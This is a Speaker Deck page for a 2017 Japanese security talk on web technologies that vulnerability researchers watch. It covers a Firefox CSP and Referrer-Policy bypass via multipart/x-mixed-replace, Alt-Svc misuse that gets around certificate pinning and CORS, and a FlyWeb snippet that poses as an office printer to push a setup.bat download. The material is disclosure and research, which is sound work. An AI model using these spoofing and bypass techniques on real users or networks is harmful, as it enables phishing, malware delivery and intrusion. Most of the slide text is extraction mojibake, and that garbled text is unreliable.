Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
脆弱性発見者が注目する近年のWeb技術
Search
MUNEAKI NISHIMURA
February 03, 2017
Technology
29
13k
脆弱性発見者が注目する近年のWeb技術
RECRUIT Technologies NIGHT vol.3の発表資料です。
MUNEAKI NISHIMURA
February 03, 2017
Tweet
Share
More Decks by MUNEAKI NISHIMURA
See All by MUNEAKI NISHIMURA
脆弱星に導かれて
nishimunea
3
2.3k
Brave Browserの脆弱性を見つけた話(iOS編)
nishimunea
3
2.5k
ブラウザの脆弱性とそのインパクト
nishimunea
26
9.8k
脆弱性発見者の目から見た、脆弱性対応の最前線
nishimunea
15
2.7k
Slack Team for Security Testers and Bug Hunters
nishimunea
1
770
Finding Vulnerabilities in Firefox for iOS
nishimunea
3
8.5k
SWIFT Code for Mozilla Bank
nishimunea
1
910
次世代プラットフォームのセキュリティモデル考察
nishimunea
6
5.3k
Other Decks in Technology
See All in Technology
エンジニアのためのドキュメント力基礎講座〜構造化思考から始めよう〜(2025/02/15jbug広島#15発表資料)
yasuoyasuo
17
6.7k
地方拠点で エンジニアリングマネージャーってできるの? 〜地方という制約を楽しむオーナーシップとコミュニティ作り〜
1coin
1
230
ホワイトボードチャレンジ 説明&実行資料
ichimichi
0
130
「海外登壇」という 選択肢を与えるために 〜Gophers EX
logica0419
0
700
Tech Blogを書きやすい環境づくり
lycorptech_jp
PRO
1
240
個人開発から公式機能へ: PlaywrightとRailsをつなげた3年の軌跡
yusukeiwaki
11
3k
抽象化をするということ - 具体と抽象の往復を身につける / Abstraction and concretization
soudai
16
5k
ハッキングの世界に迫る~攻撃者の思考で考えるセキュリティ~
nomizone
13
5.2k
人はなぜISUCONに夢中になるのか
kakehashi
PRO
6
1.6k
Swiftの “private” を テストする / Testing Swift "private"
yutailang0119
0
130
7日間でハッキングをはじめる本をはじめてみませんか?_ITエンジニア本大賞2025
nomizone
2
1.8k
PHPで印刷所に入稿できる名札データを作る / Generating Print-Ready Name Tag Data with PHP
tomzoh
0
100
Featured
See All Featured
KATA
mclloyd
29
14k
How to Think Like a Performance Engineer
csswizardry
22
1.3k
Making the Leap to Tech Lead
cromwellryan
133
9.1k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
21
2.5k
Agile that works and the tools we love
rasmusluckow
328
21k
How GitHub (no longer) Works
holman
314
140k
Gamification - CAS2011
davidbonilla
80
5.1k
The Web Performance Landscape in 2024 [PerfNow 2024]
tammyeverts
4
410
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
32
2.1k
No one is an island. Learnings from fostering a developers community.
thoeni
21
3.1k
GitHub's CSS Performance
jonrohan
1030
460k
Rails Girls Zürich Keynote
gr2m
94
13k
Transcript
੬ऑੑൃݟऀ͕͢Δۙͷ8FCٕज़ 3&$36*55FDIOPMPHJFT/*()5WPM ݄
ଜ फߊ גࣜձࣾϦΫϧʔτςΫϊϩδʔζ αΠόʔηΩϡϦςΟΤϯδχΞϦϯά෦ γχΞηΩϡϦςΟΤϯδχΞ ࠃܞଳిϝʔΧʔͰͷηΩϡϦςΟίϯαϧλϯτ ͳͲΛܦ݄ͯΑΓݱ৬ɻϦΫϧʔτͷ*%ཧج ൫ͷηΩϡϦςΟอकϦΫϧʔτάϧʔϓશࣾͷ੬ऑ ੑमਖ਼ࢧԉʹܞΘΔɻझຯϒϥβͷ੬ऑੑΛ୳͢͜ ͱɻʹใࠂͨ͠੬ऑੑ݅Λ͑Δɻஶॻʹ
ϒϥβϋοΫʢ༁ʣɻओͳߨԋྺʹ$0%& #-6& ɺ"750,:0 ɺ1BD4FD ɻΑΓ ηΩϡϦςΟɾΩϟϯϓશࠃେձߨࢣ
੬ऑੑΛൃݟ͢ΔਓͷࢹͰ ͍ͯ͠Δ8FCٕज़Λհ͠·͢
Server Push
• ʹΓٞͱվળ͕ଓ͚ΒΕ͍ͯΔ8FCٕज़ • աڈʹ4FSWFS4FOU&WFOUT8FC4PDLFU • *&5'Ͱ)551QVTIΛޮՌతʹѻ͏ٕज़ͱͯ͠ &BSMZ)JOUT͕ఏҊ͞Ε͍ͯΔ • ଞʹɺϒϥβͰ1VTI௨Λड͚औΔٕज़ͷඪ४Խ͕ਐΜͰ͓Γɺ 8FC1VTIϓϩτίϧ1VTI"1*ͷ༷ࡦఆ͕ߦͳΘΕ͍ͯΔ
• ͦΜͳதɺݸਓతʹ͍ͯ͠Δͷʜ 4FSWFS1VTI
multipart / x-mixed-replace
http://web.archive.org/web/19961020045320/http://www3.netscape.com/assist/net_sites/pushpull.html
• ɺ/FUTDBQFʹࡌ͞Εͨ࠷ݹͷ4FSWFS1VTI • .+1&(PWFS)551ͷ৴खஈͱͯ͠༻͞Ε͍ͯΔ • .P[JMMBͷ5FMFNFUSZʹΑΔͱɺݱࡏͷར༻ • ݱࡏͰɺ'JSFGPY͘Β͍͔͠·ͱʹαϙʔτ͍ͯ͠ͳ͍ • ҰମͲ͜ͰΘΕ͍ͯΔͷ͔
NVMUJQBSUYNJYFESFQMBDF
#VH[JMMBͷݕࡧը໘ https://bugzilla.mozilla.org/buglist.cgi?quicksearch=nishimunea
3*$0)5)&5" https://developers.theta360.com/ja/docs/v2.1/api_reference/commands/camera.get_live_preview.html
HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html <h1>Page 1</h1> --BOUNDARY
Content-type: text/html <h1>Page 2</h1> --BOUNDARY- ϖʔδͷσʔλ ϖʔδͷσʔλ
Կނ͍ͯ͠Δ͔ͱ͍͏ͱ
ηΩϡϦςΟϔομΛΑ͘ແࢹ͢Δ
HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Content-Security-Policy: default-src 'self' --BOUNDARY Content-type: text/html
<script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- $41ͰΠϯϥΠϯεΫϦϓτͷ࣮ߦΛېࢭ
HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Content-Security-Policy: default-src 'self' --BOUNDARY Content-type: text/html
<script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY-
https://www.mozilla.org/en-US/security/advisories/mfsa2016-45/
HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html Content-Security-Policy: default-src 'self'
<script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- $41ϔομͷҐஔΛԼʹͣΒͯ͠ΈΔ
HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html Content-Security-Policy: default-src 'self'
<script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY-
·ͩͬͯͳ͍ https://bugzilla.mozilla.org/show_bug.cgi?id=1296471
https://bugzilla.mozilla.org/show_bug.cgi?id=1296471 ੬ऑੑΛӅ͢͜ͱΑΓɺ$41ͷ࣮͕ෆશͰ͋Δ͜ͱΛ 8FCαΠτͷ։ൃऀ͕Δ͜ͱͷํ͕େͩͱஅ͠ɺ .P[JMMBະमਖ਼ͷ੬ऑੑใΛ։ࣔ
HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Referrer-Policy: no-referrer --BOUNDARY Content-type: text/html <a
href="https://evil.example.jp">Link</a> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- 3FGFSSFS1PMJDZϔομͰϦϑΝϥૹग़Λېࢭ ͳͷʹϦϑΝϥ͕ૹΒΕΔ
https://www.mozilla.org/en-US/security/advisories/mfsa2017-01/#CVE-2017-5385 'JSFGPYͰઌिमਖ਼͞Εͨ
৽͍͠ϔομ͕ొ͢Δͨͼָ͠ΊΔ
HTTP/2
• ݟ҉߸Λѱ༻ͯ͠ɺِͷ)5514αʔόʹଓͤ͞Δ͜ͱͷ Ͱ͖Δ੬ऑੑʢ$7&ʣΛ-5Ͱհͨ͠ +YDL͞Μͱͷग़ձ͍ɺIUUQษڧձͰͨ͠ https://http2study.connpass.com/event/13251/
ͦͷ੬ऑੑͷ࠶ݱө૾ΛݟͯΈ·͠ΐ͏
੬ऑੑͷݪҼ5-4ηογϣϯͷ࠶ར༻Ͱͨ͠ twitter.com (Fake) evil.csrf.jp https://twitter.com Reuse TLS Session Ticket (Session
Resumption) Fake Application Data http://evil.csrf.jp alt-svc: h2="twitter.com:8021" TLS Session Ticket http://evil.csrf.jp Establish TLS Session without server certificate verification
੬ऑੑͷݪҼ5-4ηογϣϯͷ࠶ར༻Ͱͨ͠ twitter.com (Fake) evil.csrf.jp https://twitter.com Reuse TLS Session Ticket (Session
Resumption) Fake Application Data http://evil.csrf.jp alt-svc: h2="twitter.com:8021" TLS Session Ticket http://evil.csrf.jp Establish TLS Session without server certificate verification ݟ҉߸Ͱαʔόূ໌ॻΛݕূͤͣʹ ཱ֬ͨ͠5-4ηογϣϯΛʜ )5514௨৴࣌ʹ࠶ར༻͍ͯͨ͠
• )551$POOFDUJPO3FVTF 3'$ - ಉ͡*1ΞυϨεɺ͔ͭಉ͡ূ໌ॻͷ$/4"/ʹؚ·ΕΔϗετͱͷ௨৴Ͱ͋Εɺ )551ίωΫγϣϯΛڞ༗ͯ͠Α͍ • )551"MUFSOBUJWF4FSWJDFT 3'$ -
ಉ͡ϦιʔεΛఏڙ͢Δସαʔόͷ༻ΛΫϥΠΞϯτʹఏҊ͢Δ - ྫʣBMUFYBNQMFKQͷ൪ϙʔτͰ)551ʹΑΔ௨৴ΛΦϑΝʔ )551ͷίωΫγϣϯཧͳ͔ͳ͔େม alt-svc: h2="alt.example.jp:8000";
flickr.com ෳυϝΠϯͷ)551ίωΫγϣϯΛڞ༗͢Δͱ͖ flickr.com yahoo.com yahoo.com Certificate (valid for yahoo.com &
flickr.com) Establish TLS Session ZBIPPDPNͱͷ௨৴Ͱཱ֬͞ΕͨίωΫγϣϯΛ GMJDLSDPNͱͷ௨৴ʹར༻Ͱ͖Δ Connection
flickr.com αʔόূ໌ॻͷϐϯχϯάݕূ͕Α͘࿙ΕΔ flickr.com yahoo.com yahoo.com Certificate (valid for yahoo.com &
flickr.com) Establish TLS Session Connection ͜͜ͰɺGMJDLSDPNͷެ։伴ϐϯχϯάΛݕূ͠Εͯ͠·͏ $7&ʢ'JSFGPYʣ$7&ʢ$ISPNFʣ
flickr.com ͦΕͬͯ੬ऑੑʁ flickr.com yahoo.com Certificate (valid for yahoo.com & flickr.com)
Connection yahoo.com Establish TLS Session ྆ํͷαΠτͷݖརऀҰॹͳͷͰ GMJDLSDPNͷϐϯχϯάΛݕূ͠ͳͯ͘ ࣮࣭తͳڴҖ͋·Γͳ͍ͷͰʁ
ಉ͡ূ໌ॻ͔ͩΒαΠτͷݖརऀ͕ಉ͡ͱݶΒͳ͍ • ྫ͑ɺ'BTUMZͷڞ༗ূ໌ॻαʔϏε - IUUQTKBGPVSTRVBSFDPN ͷূ໌ॻΛݟͯΈΑ͏
͜ΕΒͷαΠτͷϐϯχϯάΛᷖճͰ͖Δͱ͍͏͜ͱ
)551"MUFSOBUJWF4FSWJDF "MU4WD a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc:
h2="b.example.jp:443" Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate
"MU4WDͷਖ਼͍࣮͜͠͏ͳΜͰ͕͢ʜ a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc: h2="b.example.jp:443"
Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate BFYBNQMFDPNͷূ໌ॻΛ4/*Ͱཁٻ BFYBNQMFDPNͷূ໌ॻͰ͋Δ͜ͱΛݕূ
࣮ΛޡΔͱ%/4ϦόΠϯσΟϯά੬ऑੑʹͳΔ a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc: h2="b.example.jp:443"
Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate CFYBNQMFKQͷূ໌ॻΛ4/*Ͱཁٻ CFYBNQMFKQͷূ໌ॻͰ͋Δ͜ͱΛݕূ BFYBNQMFDPNͷ)551σʔλΛ ଞਓͷαʔόʹૹΓ͚Δ͜ͱ͕Ͱ͖Δ
͜ͷ࣮ϛε͕ݪҼͰ$034ΛᷖճͰ͖ͨྫ evil XMLHttpRequest with DELETE method alt-svc: h2="victim:443" victim Preflight
(OPTIONS method) DELETE request 1SFGMJHIUΛ߈ܸऀͷαΠτͰड͚ͯʜ ࣮ϦΫΤετ͚ͩΛඪతʹૹΔ
https://bugzilla.mozilla.org/show_bug.cgi?id=1148357 ࢲڻ͍͍ͯΔɻ͜Ε"MU4WDΛ༻͍ͨॳͷ੬ऑੑͩ
ಉ͡Α͏ͳ੬ऑੑ͕͖ͬͱࠓޙग़͖ͯͦ͏
FlyWeb
https://flyweb.github.io/#showcase
• .P[JMMB͕࣮ࢪ͍ͯ͠Δɺ8FCͱཧσόΠεͷ࿈ܞϓϩδΣΫτ - 8FCίϯςϯπͱɺͦΕΛӾཡͨ͠ਓͷۙ͘ʹ͋Δ༷ʑͳσόΠε͕࿈ಈ • ϓϩδΣΫτ·࣮ͩݧஈ֊ - 'JSFGPY/JHIUMZʹͷΈσϑΥϧτແޮͰࡌ - BCPVUDPOGJH
Ͱ EPNGMZXFCFOBCMFEUSVFʹઃఆ͢Δ͜ͱͰར༻Մೳ 'MZ8FC
• ෳͷεϚϗΛଓ͠ɺϒϥβ্ͰରઓܕϨʔεήʔϜΛ࣮ݱ 'MZ8FCͷར༻ྫʢ'MZ8FC(1ʣ https://www.youtube.com/watch?v=FJ5DEGvqDb4
'MZ8FCͷΈ Local Network (1) Launch a website (2) HTML /
JS (3) Publish mDNS and web servers (4) DNS Service Discovery (5) HTTP & WebSocket +BWB4DSJQUͰαʔόΛ্ཱͪ͛Δ ϩʔΧϧΤϦΞͷ͕ͦͷαʔόʹΞΫηε
navigator.publishServer('MyServer').then(server => { server.onfetch = e => { var headers
= {'Content-Type': 'text/html'}; var body = '<h1>Hello FlyWeb</h1>'; e.respondWith(new Response(body, {headers: headers})); }; });
navigator.publishServer('MyServer').then(server => { server.onfetch = e => { var headers
= {'Content-Type': 'text/html'}; var body = '<h1>Hello FlyWeb</h1>'; e.respondWith(new Response(body, {headers: headers})); }; }); .Z4FSWFS@GMZXFC@UDQMPDBMͱ͍͏αʔϏε໊Ͱ N%/4ͱ)551αʔόΛىಈ ϩʔΧϧΤϦΞͷ͕αʔόʹΞΫηε͖ͯͨ͠Β )FMMP'MZ8FCͱॻ͔Εͨ)5.-Λฦ͢
αʔόͷىಈ֬ೝμΠΞϩά͕ग़ͯ ϖʔδΛݟͨϢʔβ͕ʮ"MMPX4FSWFSʯΛબ͢Δͱ ϩʔΧϧΤϦΞͰN%/4ͱ)551αʔό͕ىಈ͢Δ
ϩʔΧϧΤϦΞʹ͋Δผͷ͕αʔόʹͭͳ͕Δ • 'JSFGPY͕ϩʔΧϧΤϦΞʹ͋Δ'MZ8FCαʔόΛࣗಈతʹ୳ࡧ͠ɺ ΞΫηεͰ͖ΔΑ͏ʹͯ͘͠ΕΔ
#POKPVSରԠΦϑΟεϓϦϯλͷཧը໘։͚Δ • 'JSFGPYͷ'MZ8FCΟϯυ@IUUQUDQʹରԠ͍ͯ͠ΔͷͰ #POKPVSͰ)551ͷ6*Λఏڙ͢ΔػثʹΞΫηεͰ͖Δ
'MZ8FCͰձࣾͷωοτϫʔΫʹ৵ೖͰ͖ͦ͏ͩ Local Network (1) Launch a website (2) HTML /
JS (3) Publish mDNS and web servers (4) Launch HTTP UI (5) Download malware 'MZ8FCͰΦϑΟεϓϦϯλͷ ཧը໘ʹͳΓ͢·͢ ཧը໘ʹΞΫηεͨ͠ʹ ϚϧΣΞ ͏͔ͬΓࣾһ͕᠘αΠτΛӾཡ
navigator.publishServer('Can0n ME220').then(server => { server.onfetch = e => { var
h = {'Content-Type': 'application/bat', 'Content-Disposition': 'attachment; filename=setup.bat'}; var cmd = 'calc'; e.respondWith(new Response(cmd, {headers: h})); }; }); ΦϑΟεϓϦϯλͱಉ͡%/4໊Λࢦఆ ΞΫηεͨ͠ʹ TFUVQCBU Λ
͕͢͞ʹυϝΠϯ͕ո͍͠ͷͰܯռ͞Εͦ͏͚ͩͲʜ
(PPHMF༁ܦ༝Ͱ։͚ͦΕͬΆ͍υϝΠϯʹ
ଞͷࣾһِ͕ͷΦϑΟεϓϦϯλʹΞΫηε͢Δͱʜ ϓϦϯλυϥΠό͔ͳ͊ʜʁ
None
͜ͷ··ͷ༷ͩͱຊʹѱ༻͞Εͦ͏
• 4FSWFS1VTI NVMUJQBSUYNJYFESFQMBDF • )551 • 'MZ8FC ͍ͯ͠Δ8FCٕज़Λͭհ͠·ͨ͠